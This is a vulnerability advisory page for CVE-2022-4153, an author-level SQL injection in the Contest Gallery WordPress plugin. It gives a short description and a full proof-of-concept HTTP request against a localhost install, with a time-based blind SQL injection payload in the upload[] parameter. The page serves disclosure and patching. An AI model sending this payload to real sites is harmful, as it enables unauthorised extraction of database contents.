Lucene search
Daniel KrohmerWPEX-ID:35B0126D-9293-4E64-A00F-0903303F960AHistoryDec 05, 2022 - 12:00 a.m.
Contest Gallery < 19.1.5.1 - Author+ SQL Injection
2022-12-0500:00:00
Daniel Krohmer
93
sql injection
contest gallery
author+
security issue
form data
xmlhttprequest
wordpress
localhost
EPSS
0.001
Percentile
36.8%
The plugins do not escape the upload[] POST parameter before concatenating it to an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&option_id=1&define_upload=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2697798261719864473183552564
Content-Length: 1215
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="_wpnonce"
07bde4fc61
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/admin-ajax.php?page=contest-gallery%2Findex.php&option_id=1&define_upload=true
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="option_id"
1
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="upload[1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)][type]"
url
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="upload[1][order]"
4
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="actualID[]"
1
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="action"
post_contest_gallery_action_ajax
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="cgBackendHash"
e12e8782da8ac6c4f1725d81a9811524
-----------------------------2697798261719864473183552564--
Related
wpvulndb
wpvulndb
Contest Gallery < 19.1.5.1 - Author+ SQL Injection
2022-12-05 00:00:00
cvelist
cvelist
CVE-2022-4153 Contest Gallery < 19.1.5.1 - Author+ SQL Injection
2022-12-26 12:27:56
cve
cve
CVE-2022-4153
2022-12-26 13:15:12
nvd
nvd
CVE-2022-4153
2022-12-26 13:15:12
prion
prion
Cross site request forgery (csrf)
2022-12-26 13:15:00